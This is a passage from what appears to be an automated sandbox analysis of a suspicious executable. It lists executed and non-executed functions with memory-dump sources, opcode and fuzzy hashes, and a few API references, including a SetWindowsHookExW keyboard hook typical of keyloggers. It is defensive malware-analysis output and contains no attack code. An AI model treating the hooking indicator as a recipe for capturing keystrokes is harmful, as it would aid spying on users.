Instruction Fuzzy Hash: 273199B4D012189FCF14CFA9D884ADEFBB5EB49314F24982AE915B7300D735A901CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001DD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139351733.00000000001DD000.00000040.00000001.sdmp, Offset: 001DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d222e3352a2fb703b87f8efa4c6ff13eeee6ec9e85cf71d30bc1732082e64b85
Instruction ID: 5e779430b10a73ff85e40bf59800bc71a75ab424229de29c742a47e34eb66ebf
Opcode Fuzzy Hash: d222e3352a2fb703b87f8efa4c6ff13eeee6ec9e85cf71d30bc1732082e64b85
Instruction Fuzzy Hash: CC21D475604244DFDB14DF64E984B16BBA5FBC8314F34C9AAE8094B346C336D847CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001DD006, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139351733.00000000001DD000.00000040.00000001.sdmp, Offset: 001DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 683bea0e3bd69910bfa500636086421dc6727d7a9fec64a982b2e006e09bbfeb
Instruction ID: 894c9ff5a4c4ba7780d2ba50acd76634fa3c2209b833ee6e2ed6ffb52f3912df
Opcode Fuzzy Hash: 683bea0e3bd69910bfa500636086421dc6727d7a9fec64a982b2e006e09bbfeb
Instruction Fuzzy Hash: 69216F755093808FCB12CF24D994B15BF71EB86314F28C5EBD8498B697C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 001CD1C5, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139340316.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1211a255df6eb97692d0247311a5344e32e2f007581510e34e7194957aca3ee8
Instruction ID: b835f52af65c37dd2cb03fd2326210bd1b6ec67d4667a290f45e382cc588bade
Opcode Fuzzy Hash: 1211a255df6eb97692d0247311a5344e32e2f007581510e34e7194957aca3ee8
Instruction Fuzzy Hash: 4301A7310043449BD7244F65E988F67BBDCEF61724F18C47EE9485A282C774EC40C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 001CD1C4, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139340316.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0cf16259137e350faac6ba2fdfe3d2762ea8abd1e2ad808807226ab9d1b54f0
Instruction ID: 4b39bad2fdb65ba21f5e4b78339853c4f7fe80b9993404f2303b5b481961c94a
Opcode Fuzzy Hash: f0cf16259137e350faac6ba2fdfe3d2762ea8abd1e2ad808807226ab9d1b54f0
Instruction Fuzzy Hash: A1F04F71404244ABE7108E55E888B62FFD8EF91734F28C56AED485E286C378E844CAA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00334837, Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

@2Em, xrefs: 00334A45

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID: @2Em
API String ID: 0-598872186
Opcode ID: 0d94372a36e8986f4ebc1a5fb462b4f79d243cefb64a1bc2ca5852b1ff652646
Instruction ID: 8e57e8ecd00193360b1c23dae41e9cb08173af270eeaaa0997d206384b76e6b4
Opcode Fuzzy Hash: 0d94372a36e8986f4ebc1a5fb462b4f79d243cefb64a1bc2ca5852b1ff652646
Instruction Fuzzy Hash: 0B517B74906208CFDB44EFB9D980AADBFF7EBC8304F00C93AD015AB665DB7099458B91

Uniqueness

Uniqueness Score: -1.00%

Function 00334848, Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

@2Em, xrefs: 00334A45

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID: @2Em
API String ID: 0-598872186
Opcode ID: bbb8be5f066a0d4d1df0d2b1d3ab9b6cd49250dc0a19465a3934d22329f878f5
Instruction ID: 76d394513d049978594776dc6e6cae0ce18cc31ba355b519a04084f836fd4751
Opcode Fuzzy Hash: bbb8be5f066a0d4d1df0d2b1d3ab9b6cd49250dc0a19465a3934d22329f878f5
Instruction Fuzzy Hash: 58512A749062098FDB44EFB9D980AADBFF7EBC8304F00C93AD015AB664DB7099458B91

Uniqueness

Uniqueness Score: -1.00%

Function 00334A98, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ff8fc477d6f9737bd544e01f0da9c92852bcf87498e80a876f6d08f3d6d7bab
Instruction ID: 0cd553c7517c07eeda80f0ee4c59383deaf47306c865b2976144a804c5f30fe2
Opcode Fuzzy Hash: 6ff8fc477d6f9737bd544e01f0da9c92852bcf87498e80a876f6d08f3d6d7bab
Instruction Fuzzy Hash: 3D412AB1E056188BEB5CCF6B8D4068DFAF7BFC9300F54D1BA950DA6215DB7005868F14

Uniqueness

Uniqueness Score: -1.00%

Function 0033E001, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9271643471dcfa06dbe32740cedf2c6408bdfdb049b852d59046abc85fd22d91
Instruction ID: d2638b14543ee67503b0305f737d44034d7bfbe9bcee922204c9bf0b76d9c013
Opcode Fuzzy Hash: 9271643471dcfa06dbe32740cedf2c6408bdfdb049b852d59046abc85fd22d91
Instruction Fuzzy Hash: AB118E31D05228CFDB19CFB5C5987EEBBF1AB0A305F249069D451B72A0C7798948DB74

Uniqueness

Uniqueness Score: -1.00%

Function 0033E010, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2f65f9db537d78dade519c96ae50d98ca3d3f44ac19202c4dbb0c2dce32de76
Instruction ID: 2f4ed56879415d681be08e69116fa39c05c23ee3ca8bfc95524de577a76b16de
Opcode Fuzzy Hash: b2f65f9db537d78dade519c96ae50d98ca3d3f44ac19202c4dbb0c2dce32de76
Instruction Fuzzy Hash: 3E113C30D05258CBDB19CFA6C4987EDBBF5AB4A301F149069D455B3290CBB88984DB78

Uniqueness

Uniqueness Score: -1.00%

Function 0033DF50, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cba81545382d93334823fd8f5a8f1e2a65c372e199d2c2093df5539467c88159
Instruction ID: 9a9f91beba5117e30c2fb95e13a04bb8b27efa6776ec930007f77e0aba9edddd
Opcode Fuzzy Hash: cba81545382d93334823fd8f5a8f1e2a65c372e199d2c2093df5539467c88159
Instruction Fuzzy Hash: 7B115A30D042188BDB158FA5D8887EDBAF5AF4A301F14946AE452B3290C7784984DB68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: pridingnsjhfhdjs.exe PID: 912 Parent PID: 260 pridingnsjhfhdjs.exeCOMMON

Executed Functions

Function 00A47150, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 00A4FAFB

Memory Dump Source

Source File: 00000007.00000002.2394684375.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 2768bad1a179c61feeaee0e07911325345934d511ca89fc740736282a00736b4
Instruction ID: 2e21270b8bf26402958da23e398400d26e9ceec8481e546fa32fa36743b6909f
Opcode Fuzzy Hash: 2768bad1a179c61feeaee0e07911325345934d511ca89fc740736282a00736b4
Instruction Fuzzy Hash: 742113759002089FCB10CF99D844BEEFBF9FB88310F24882AE459A7350C7B4A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 003694A0, Relevance: 3.7, APIs: 2, Instructions: 664COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 79eaa60302b31c83288031a8719bbfcaea944cf8c4d21822dbb8d474a2060000
Instruction ID: 5a138f36214330c9aa658bb08b843cab91698725ff2de944a6aa0fd5e1b6412e
Opcode Fuzzy Hash: 79eaa60302b31c83288031a8719bbfcaea944cf8c4d21822dbb8d474a2060000
Instruction Fuzzy Hash: F0623874A04219CFCB65EF24C85879CB7BABF88305F20C5EAD50AA7255DB349E82CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003694C1, Relevance: 3.6, APIs: 2, Instructions: 582COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fc0cd9a794cedc77d6f4829570eb75b80738b76ce7868b141b1fb94bbf6e5dcd
Instruction ID: 971bb118bd952c1e72d7eae352095e6ed350dc1767b4533c1dac43e60657ae4c
Opcode Fuzzy Hash: fc0cd9a794cedc77d6f4829570eb75b80738b76ce7868b141b1fb94bbf6e5dcd
Instruction Fuzzy Hash: 87422674A04219CFCB25DF74C85879CB7BABF88305F2085EAD50AA7255DB389E82CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00369506, Relevance: 3.6, APIs: 2, Instructions: 575COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 911ccafd01618ef5ff3ef07d52385532d10e0690a62101756cdce7573b237ec4
Instruction ID: e21b4f05a4d735a341d1be1d11416030b268b567c065718ee196a3542800ad83
Opcode Fuzzy Hash: 911ccafd01618ef5ff3ef07d52385532d10e0690a62101756cdce7573b237ec4
Instruction Fuzzy Hash: 50422774A04219CFCB25DF64C85879CB7BABF88305F2085EAD50AA7255DB389E82CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0036954B, Relevance: 3.6, APIs: 2, Instructions: 568COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ebf3c61a1bcbd964a3172dca5f2e2c9b5ce507d7566b47b29d1481883f3c7e92
Instruction ID: 9ee19a4806654a9fb81c769301c6e76b88f4fa4d51cd69f7adb13d7e5917c029
Opcode Fuzzy Hash: ebf3c61a1bcbd964a3172dca5f2e2c9b5ce507d7566b47b29d1481883f3c7e92
Instruction Fuzzy Hash: 24422674A04219CFCB25DF64C85879CB7BABF88305F2085EAD50AA7255DB389E82CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00369590, Relevance: 3.6, APIs: 2, Instructions: 561COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: edc023c127f7a95403a7b0a7bfd7162d2c65fff7e1dd03699c934e93f6aca610
Instruction ID: b743e6a56b041f0388728b58bd7f3921b605cb6fae1001dcfe778cf5a0cab4e1
Opcode Fuzzy Hash: edc023c127f7a95403a7b0a7bfd7162d2c65fff7e1dd03699c934e93f6aca610
Instruction Fuzzy Hash: 3A422674A04219CFCB25DF74C85879CB7BABF88305F2085E9D50AA7255DB389E82CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003695D5, Relevance: 3.6, APIs: 2, Instructions: 554COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e8e77cb4cd41830b80c1851cb853f1d53ccfdc805bbf05ee84fa8d4ce4d5e23e
Instruction ID: 79948b847856f85740c1b759e28b7313a95ed4fa2c907c385a1fbbdb84f39201
Opcode Fuzzy Hash: e8e77cb4cd41830b80c1851cb853f1d53ccfdc805bbf05ee84fa8d4ce4d5e23e
Instruction Fuzzy Hash: A3423674A04219CFCB25EF74C85879CB7BABF88305F2085E9D50AA7255DB389E82CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00369A2C, Relevance: 3.4, APIs: 2, Instructions: 388COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE
KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 29361b312024d1830c2a3692f1cc2ff8b5ec720804dbd311eb557c43f607e397
Instruction ID: 7dce0e7bb5e4305ef2f6e78e1b5c5abc039cbf69e47b5045aabc65eb8d7a1bb3
Opcode Fuzzy Hash: 29361b312024d1830c2a3692f1cc2ff8b5ec720804dbd311eb557c43f607e397
Instruction Fuzzy Hash: 02020674A04215CFCB66DB24C94479CB7BABF88305F20C4EAD50AA7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369A71, Relevance: 3.4, APIs: 2, Instructions: 381COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE
KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4b24700cbc186546d8081b36de0c3e51480cb587c65810b12ba222eda2104d1c
Instruction ID: e353cc229194388ad89e17f3b6329aed58231cfc30dee0ebab546719dce7ce4a
Opcode Fuzzy Hash: 4b24700cbc186546d8081b36de0c3e51480cb587c65810b12ba222eda2104d1c
Instruction Fuzzy Hash: 02021674A04215CFCB66DB24C84479CB7BABF88305F20C4EAD50AA7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369AB6, Relevance: 3.4, APIs: 2, Instructions: 374COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE
KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d82fe079531a6962b8426bcd0203e8686b93e33b240f500a5812f76eb890fb5f
Instruction ID: 503930a53aa29ef0a1ec89a1847b5f94ab41292e417019e5cc9139fefce16b89
Opcode Fuzzy Hash: d82fe079531a6962b8426bcd0203e8686b93e33b240f500a5812f76eb890fb5f
Instruction Fuzzy Hash: E4021674A04215CFCB66DB24C85479CB7BABF88305F20C4EAD50AA7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369AFB, Relevance: 3.4, APIs: 2, Instructions: 367COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE
KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: af42c6df6e795b9fb6328ba3f19bcdee832f6fb3aefafd7da478dd32a0c134d2
Instruction ID: c8d6b887e40a19e5e86fc2630f311783a57e1c103c76e6f34adbde276092d9b2
Opcode Fuzzy Hash: af42c6df6e795b9fb6328ba3f19bcdee832f6fb3aefafd7da478dd32a0c134d2
Instruction Fuzzy Hash: 57021774A04215CFCB26DB24C95479CB7BABF88305F20C4EAD50AA7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369B40, Relevance: 3.4, APIs: 2, Instructions: 360COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE
KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d608ae24a61446c8128803007ca0a2446e365ad6b9740cbde6fe4bbd677b7e28
Instruction ID: 7b1b45d4104f4cda2cfd639b349c5c4a70488fce97201658d4b940f1ff4fb938
Opcode Fuzzy Hash: d608ae24a61446c8128803007ca0a2446e365ad6b9740cbde6fe4bbd677b7e28
Instruction Fuzzy Hash: E9021874A04215CFCB66DB24C85479CB7BABF88305F20C4EAD509A7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369B85, Relevance: 3.4, APIs: 2, Instructions: 353COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE
KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8d805fd884ec295a1bfc2b2b810b41358406fc052531d2ef44e6b80a46161d64
Instruction ID: 93e231017f19488e893cbbf2409ed591fe52d8bd398d733254872d15c10feaa4
Opcode Fuzzy Hash: 8d805fd884ec295a1bfc2b2b810b41358406fc052531d2ef44e6b80a46161d64
Instruction Fuzzy Hash: D0F11774A04215CFCB26DB24C85479CB7BABF88305F20C4EAD50AA7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369BCA, Relevance: 3.3, APIs: 2, Instructions: 346COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00369BEE
KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ca94b1415e0f12d309a42700c360fbe7103a6d458878f3698d654e7977725a80
Instruction ID: 0b6a8f9bcf1931e9af031b6c2c0d0532658af5ff5c2750e2abb9287f81b61760
Opcode Fuzzy Hash: ca94b1415e0f12d309a42700c360fbe7103a6d458878f3698d654e7977725a80
Instruction Fuzzy Hash: 52F10774A04215CFCB66DB24C85479CB7BABF88305F20C4EAD50AA7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369C4D, Relevance: 2.1, APIs: 1, Instructions: 570COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4171f8e3eb8f100261caa1dbdba683bc529439b0c51f8e9565151a9c812a5e
Instruction ID: 4c7bccd4659e536142f37e936a0c3ea2c09ca5d723e7ff632ef679276164fef1
Opcode Fuzzy Hash: fe4171f8e3eb8f100261caa1dbdba683bc529439b0c51f8e9565151a9c812a5e
Instruction Fuzzy Hash: DC423878A04218CFCB65DF24C85479DB7BABF89309F20C4E9D609A7255DB349E82CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00369C25, Relevance: 1.8, APIs: 1, Instructions: 335COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dd05f54d7c5a50dc8b731ba72cb8fd9e8432910a131e09f9a75bf1919d254087
Instruction ID: 89130adf39aa7f7cc7e4daedaac5b2d0ae0e7075ab882bd74d0546c3d32b08ab
Opcode Fuzzy Hash: dd05f54d7c5a50dc8b731ba72cb8fd9e8432910a131e09f9a75bf1919d254087
Instruction Fuzzy Hash: 5DF11874A04215CFCB26DB24C85479CB7BABF88309F20C4EAD509A7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369C6A, Relevance: 1.8, APIs: 1, Instructions: 328COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7fdd2f0a746b4d26663a8c2899bee51bd1aa2d844d18d7f4e6e2c276a3f03e83
Instruction ID: e6f5ebced671c7792c711456664f9da1d99255c1394eec54871e56e5c36161f2
Opcode Fuzzy Hash: 7fdd2f0a746b4d26663a8c2899bee51bd1aa2d844d18d7f4e6e2c276a3f03e83
Instruction Fuzzy Hash: 9EE10674A04215CFCB66DB24C85479CB7BABF88305F20C4EAD50AA7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369CAF, Relevance: 1.8, APIs: 1, Instructions: 321COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a1db6e77bc0508135dd487077bee21588d7bb6c0e44d8e3235a5816024abbbdd
Instruction ID: aa74e9f3ba397d280746cdc88ee9b578684eeaaa6041a94c40c667c2026499b7
Opcode Fuzzy Hash: a1db6e77bc0508135dd487077bee21588d7bb6c0e44d8e3235a5816024abbbdd
Instruction Fuzzy Hash: D6E10674A04215CFCB66DB24C85479CB7BAAF88305F20C4EAD50AE7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369CF4, Relevance: 1.8, APIs: 1, Instructions: 314COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7e23189476323544efe306d57d4b18e458d6d13d5b05ab02c104f777a0677c86
Instruction ID: 47ac1db8dbdec4cc43167a8377354f375ebe89f8cf0e6104037fc8c3367a750f
Opcode Fuzzy Hash: 7e23189476323544efe306d57d4b18e458d6d13d5b05ab02c104f777a0677c86
Instruction Fuzzy Hash: 42E11674A04215CFCB66DB24C85479CB7BAAF88305F20C4EAD50AE7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369D39, Relevance: 1.8, APIs: 1, Instructions: 307COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fa6ec6142178f123dcb6a14eeb98927140baffb9d221018142fdeddb2aa1cfc0
Instruction ID: ea99660b435289e6671b3bb787a8277e7bb4a52b80d3794d9b05259e5e04353c
Opcode Fuzzy Hash: fa6ec6142178f123dcb6a14eeb98927140baffb9d221018142fdeddb2aa1cfc0
Instruction Fuzzy Hash: 7EE11674A04215CFCB66DB24C85479CB7BAAF88305F20C4EAD50AE7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369D7E, Relevance: 1.8, APIs: 1, Instructions: 300COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c48f278e8165f7e2998f28ffa7824f479db0a6ae83d5e9b8939e3efdb0f34c6e
Instruction ID: ea1813ac323229841d4e5466025f6f706d8dfe0d7162b22f5089ecf06ae8ee1d
Opcode Fuzzy Hash: c48f278e8165f7e2998f28ffa7824f479db0a6ae83d5e9b8939e3efdb0f34c6e
Instruction Fuzzy Hash: A8D11774A04215CFCB66DB24C85479CB7BAAF88305F20C4EAD50AE7355DB399E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369DC6, Relevance: 1.8, APIs: 1, Instructions: 293COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: bd64df389b5a7919b66f7dd3a74768e9a4452d6fbd8f6d29f6a314eec2ac9cdc
Instruction ID: a7f4bf348ac58babd18e1aafe96e0fcb670996cee23a4d9be89124587cf1069d
Opcode Fuzzy Hash: bd64df389b5a7919b66f7dd3a74768e9a4452d6fbd8f6d29f6a314eec2ac9cdc
Instruction Fuzzy Hash: 9AD12874A04215CFCB66DB24C85479CB7BAAF88305F20C4E9D50AE7395DB389E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369E0E, Relevance: 1.8, APIs: 1, Instructions: 286COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a9accc5df61d610c3502ec03d411cd86bd4904902420cb0d9632bf194083f878
Instruction ID: 27db17a640dca792635081a744d78318b7c085ae671833d3feba0ec504aa48e4
Opcode Fuzzy Hash: a9accc5df61d610c3502ec03d411cd86bd4904902420cb0d9632bf194083f878
Instruction Fuzzy Hash: 04D13774A04215CFCB66DB24C85479CB7BAAF88305F20C5E9D50AE7395DB389E86CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369E56, Relevance: 1.8, APIs: 1, Instructions: 279COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3b0339cb26c9c86d3d92fee4da99bb9b83ec6baf1ab9c7651a9c2a1a9185ff1c
Instruction ID: 2a73357ef2f61295362dde650aa0a1553514ee1f514cca7095388c93a94f8a21
Opcode Fuzzy Hash: 3b0339cb26c9c86d3d92fee4da99bb9b83ec6baf1ab9c7651a9c2a1a9185ff1c
Instruction Fuzzy Hash: 42C13774A04215CFCB66DB24C85479CB7BAAF88305F20C4E9D50AE7395DB389E86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00369E9E, Relevance: 1.8, APIs: 1, Instructions: 272COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2dfb58a2db996a57ae151af3c60ff686fb4a7d62e5c2a2a8d7db8584c20063a4
Instruction ID: 5a7195d93ede5f00676fd695445220f3c01cdca84c326ddfb6027d4e608f21b0
Opcode Fuzzy Hash: 2dfb58a2db996a57ae151af3c60ff686fb4a7d62e5c2a2a8d7db8584c20063a4
Instruction Fuzzy Hash: BCC13874A04215CFCB65DB24C85479CB7BAAF88305F20C4E9D50AE7395DB389E86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00369EE6, Relevance: 1.8, APIs: 1, Instructions: 265COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4792f19d42bed3c65218b1bb16d79ece35adbbb04f1732e3625ddb69bdf7b4a9
Instruction ID: 57a1c94e1c7c77d166980192d9d4e6b0d31ea2679e8053c1232b12e0bd0f4074
Opcode Fuzzy Hash: 4792f19d42bed3c65218b1bb16d79ece35adbbb04f1732e3625ddb69bdf7b4a9
